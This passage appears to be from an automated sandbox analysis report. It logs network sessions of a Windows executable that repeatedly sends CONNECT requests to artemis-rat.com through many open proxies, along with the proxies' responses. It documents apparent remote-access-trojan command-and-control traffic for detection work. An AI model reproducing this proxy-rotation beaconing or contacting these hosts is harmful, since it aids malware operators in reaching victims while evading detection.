                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905155897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.592736006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            295192.168.2.550837162.159.242.10803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.838001966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.998965979 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            296192.168.2.55069951.79.240.9431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.838001966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.545456886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.561085939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.635730028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702657938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852288961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            297192.168.2.55085223.227.38.230803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.838054895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.992464066 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            298192.168.2.550668185.250.27.5431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.838179111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.561068058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.969841957 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            299192.168.2.5507155.196.111.30200603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.838895082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            300192.168.2.550842104.25.194.175803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.838900089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.993407011 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            301192.168.2.550631103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.839229107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            302192.168.2.550839165.227.0.192803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.840991974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.311052084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.858042002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.951723099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217643023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505887032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.797264099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217742920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.014370918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            303192.168.2.55084365.49.38.20231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.843519926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:16.886677980 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.910579920 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:26.118601084 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:38.407006025 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:02.471137047 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            304192.168.2.550755147.75.34.83100063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.845004082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.150233984 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            305192.168.2.550722120.78.191.68803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.846055984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.180461884 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            306192.168.2.550028184.178.172.18152803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.850102901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            307192.168.2.550867104.20.89.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.850545883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.004708052 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            308192.168.2.55077572.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.850619078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            309192.168.2.55081938.54.95.1931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.852996111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.072160959 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            310192.168.2.550868172.67.181.97803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.853615046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.008230925 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
